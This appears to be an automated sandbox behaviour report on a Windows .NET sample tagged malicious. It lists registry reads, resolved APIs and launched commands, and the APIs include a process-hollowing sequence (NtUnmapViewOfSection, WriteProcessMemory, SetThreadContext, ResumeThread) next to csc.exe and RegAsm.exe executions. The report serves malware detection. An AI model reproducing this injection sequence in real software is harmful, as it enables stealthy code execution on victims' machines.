HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Deployment__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Management__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Management__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Xml.Linq__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Xml.Linq__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Runtime.Remoting__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Runtime.Remoting__b77a5c561934e089
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\FORCE_ASSEMREF_DUPCHECK
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NicPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\RegistryRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath2

Read Keys

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\NET Framework Setup\NDP\v4\Full\Release
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseRetryAttempts
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseMillisecondsBetweenRetries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGen\Policy\v4.0\OptimizeUsedBinaries
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AltJit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index23
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Defaults\Provider Types\Type 024\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\FORCE_ASSEMREF_DUPCHECK
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NicPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\RegistryRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath2

Write Keys

Nothing to display

Delete Keys

Nothing to display

Mutexes

Resolved APIs

advapi32.dll.RegOpenKeyExW
advapi32.dll.RegQueryInfoKeyW
advapi32.dll.RegEnumKeyExW
advapi32.dll.RegEnumValueW
advapi32.dll.RegCloseKey
advapi32.dll.RegQueryValueExW
kernel32.dll.FlsAlloc
kernel32.dll.FlsFree
kernel32.dll.FlsGetValue
kernel32.dll.FlsSetValue
kernel32.dll.InitializeCriticalSectionEx
kernel32.dll.CreateEventExW
kernel32.dll.CreateSemaphoreExW
kernel32.dll.SetThreadStackGuarantee
kernel32.dll.CreateThreadpoolTimer
kernel32.dll.SetThreadpoolTimer
kernel32.dll.WaitForThreadpoolTimerCallbacks
kernel32.dll.CloseThreadpoolTimer
kernel32.dll.CreateThreadpoolWait
kernel32.dll.SetThreadpoolWait
kernel32.dll.CloseThreadpoolWait
kernel32.dll.FlushProcessWriteBuffers
kernel32.dll.FreeLibraryWhenCallbackReturns
kernel32.dll.GetCurrentProcessorNumber
kernel32.dll.GetLogicalProcessorInformation
kernel32.dll.CreateSymbolicLinkW
kernel32.dll.EnumSystemLocalesEx
kernel32.dll.CompareStringEx
kernel32.dll.GetDateFormatEx
kernel32.dll.GetLocaleInfoEx
kernel32.dll.GetTimeFormatEx
kernel32.dll.GetUserDefaultLocaleName
kernel32.dll.IsValidLocaleName
kernel32.dll.LCMapStringEx
kernel32.dll.GetTickCount64
advapi32.dll.EventRegister
mscoree.dll.#142
mscoreei.dll.RegisterShimImplCallback
mscoreei.dll.OnShimDllMainCalled
mscoreei.dll._CorExeMain
shlwapi.dll.UrlIsW
version.dll.GetFileVersionInfoSizeW
version.dll.GetFileVersionInfoW
version.dll.VerQueryValueW
clr.dll.SetRuntimeInfo
clr.dll._CorExeMain
mscoree.dll.CreateConfigStream
mscoreei.dll.CreateConfigStream
kernel32.dll.GetNumaHighestNodeNumber
kernel32.dll.GetSystemWindowsDirectoryW
advapi32.dll.AllocateAndInitializeSid
advapi32.dll.OpenProcessToken
advapi32.dll.GetTokenInformation
advapi32.dll.InitializeAcl
advapi32.dll.AddAccessAllowedAce
advapi32.dll.FreeSid
kernel32.dll.AddSIDToBoundaryDescriptor
kernel32.dll.CreateBoundaryDescriptorW
kernel32.dll.CreatePrivateNamespaceW
kernel32.dll.OpenPrivateNamespaceW
kernel32.dll.DeleteBoundaryDescriptor
kernel32.dll.WerRegisterRuntimeExceptionModule
kernel32.dll.RaiseException
mscoree.dll.#24
mscoreei.dll.#24
ntdll.dll.NtSetSystemInformation
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
kernel32.dll.GetNativeSystemInfo
ole32.dll.CoInitializeEx
cryptbase.dll.SystemFunction036
ole32.dll.CoGetContextToken
clrjit.dll.sxsJitStartup
clrjit.dll.getJit
kernel32.dll.CloseHandle
kernel32.dll.GetCurrentProcess
kernel32.dll.LocaleNameToLCID
kernel32.dll.LCIDToLocaleName
kernel32.dll.GetUserPreferredUILanguages
nlssorting.dll.SortGetHandle
nlssorting.dll.SortCloseHandle
kernel32.dll.GetTempPathW
ole32.dll.CoTaskMemAlloc
ole32.dll.CoTaskMemFree
kernel32.dll.GetFullPathNameW
cryptsp.dll.CryptGetDefaultProviderW
cryptsp.dll.CryptAcquireContextW
cryptsp.dll.CryptGenRandom
kernel32.dll.SetThreadErrorMode
kernel32.dll.CreateFileW
kernel32.dll.GetFileType
kernel32.dll.WriteFile
kernel32.dll.GetFileAttributesExW
kernel32.dll.GetCurrentDirectoryW
kernel32.dll.GetStdHandle
kernel32.dll.GetEnvironmentStrings
kernel32.dll.GetEnvironmentStringsW
kernel32.dll.FreeEnvironmentStringsW
kernel32.dll.GetACP
kernel32.dll.UnmapViewOfFile
kernel32.dll.CreateProcessW
kernel32.dll.DuplicateHandle
kernel32.dll.GetExitCodeProcess
kernel32.dll.GetFileSize
kernel32.dll.ReadFile
kernel32.dll.DeleteFileW
mscoree.dll.GetProcessExecutableHeap
mscoreei.dll.GetProcessExecutableHeap
kernel32.dll.FindResourceA
kernel32.dll.SizeofResource
kernel32.dll.LoadResource
kernel32.dll.LockResource
gdiplus.dll.GdiplusStartup
kernel32.dll.IsProcessorFeaturePresent
user32.dll.GetWindowInfo
user32.dll.GetAncestor
user32.dll.GetMonitorInfoA
user32.dll.EnumDisplayMonitors
user32.dll.EnumDisplayDevicesA
gdi32.dll.ExtTextOutW
gdi32.dll.GdiIsMetaPrintDC
gdiplus.dll.GdipCreateBitmapFromStream
windowscodecs.dll.DllGetClassObject
kernel32.dll.WerRegisterMemoryBlock
gdiplus.dll.GdipImageForceValidation
gdiplus.dll.GdipGetImageRawFormat
gdiplus.dll.GdipGetImageWidth
gdiplus.dll.GdipGetImageHeight
gdiplus.dll.GdipBitmapGetPixel
shell32.dll.SHGetFolderPathW
kernel32.dll.CopyFileW
kernel32.dll.DeleteFileA
kernel32.dll.WideCharToMultiByte
kernel32.dll.LoadLibraryA
kernel32.dll.GetProcAddress
kernel32.dll.GetModuleHandleA
advapi32.dll.LookupPrivilegeValueW
advapi32.dll.AdjustTokenPrivileges
ntdll.dll.NtQuerySystemInformation
kernel32.dll.CreateProcessA
kernel32.dll.GetThreadContext
kernel32.dll.Wow64GetThreadContext
kernel32.dll.SetThreadContext
kernel32.dll.Wow64SetThreadContext
kernel32.dll.ReadProcessMemory
kernel32.dll.WriteProcessMemory
ntdll.dll.NtUnmapViewOfSection
kernel32.dll.VirtualAllocEx
kernel32.dll.ResumeThread
ole32.dll.CoUninitialize
oleaut32.dll.#500
gdiplus.dll.GdipDisposeImage
cryptsp.dll.CryptReleaseContext
kernel32.dll.CreateActCtxW
kernel32.dll.AddRefActCtx
kernel32.dll.ReleaseActCtx
kernel32.dll.ActivateActCtx
kernel32.dll.DeactivateActCtx
kernel32.dll.GetCurrentActCtx
kernel32.dll.QueryActCtxW
advapi32.dll.EventUnregister
kernel32.dll.GetProcessPreferredUILanguages
kernel32.dll.GetUserDefaultUILanguage
version.dll.GetFileVersionInfoSizeA
version.dll.GetFileVersionInfoA
version.dll.VerQueryValueA
alink.dll.CreateALink
mscoree.dll.CLRCreateInstance
mscoreei.dll.CLRCreateInstance
cryptsp.dll.CryptAcquireContextA
cryptsp.dll.CryptCreateHash
cryptsp.dll.CryptHashData
cryptsp.dll.CryptGetHashParam
cryptsp.dll.CryptDestroyHash
clr.dll.DllGetClassObjectInternal
clr.dll.StrongNameTokenFromPublicKey
clr.dll.StrongNameFreeBuffer
clr.dll.CompareAssemblyIdentityWithConfig
clr.dll.CreateAssemblyConfigCookie
clr.dll.DestroyAssemblyConfigCookie
clr.dll.CreateAssemblyNameObject
cryptsp.dll.CryptImportKey
cryptsp.dll.CryptExportKey
cryptsp.dll.CryptDestroyKey
mscorpehost.dll.InitializeSxS
mscorpehost.dll.CreateICeeFileGen
mscorpehost.dll.DestroyICeeFileGen
ole32.dll.CoCreateGuid
diasymreader.dll.DllGetClassObject
rpcrt4.dll.UuidCreate
kernel32.dll.NlsGetCacheUpdateCount
ole32.dll.CreateStreamOnHGlobal
mscoree.dll.CorExitProcess
mscoreei.dll.CorExitProcess

Execute Commands

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Seven01\AppData\Local\Temp\ighazuig.cmdline"
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Seven01\AppData\Local\Temp\RESF1D2.tmp" "c:\Users\Seven01\AppData\Local\Temp\CSC705FD4CA1C4ADE86CE37CC17CD43F6.TMP"

Started Services

Nothing to display

Created Services

Nothing to display

#infosec #automation

TheSystem Itself @ 2018-04-18 21:30:05

Detected family: #Malicious

TheSystem Itself @ 2018-04-18 21:42:01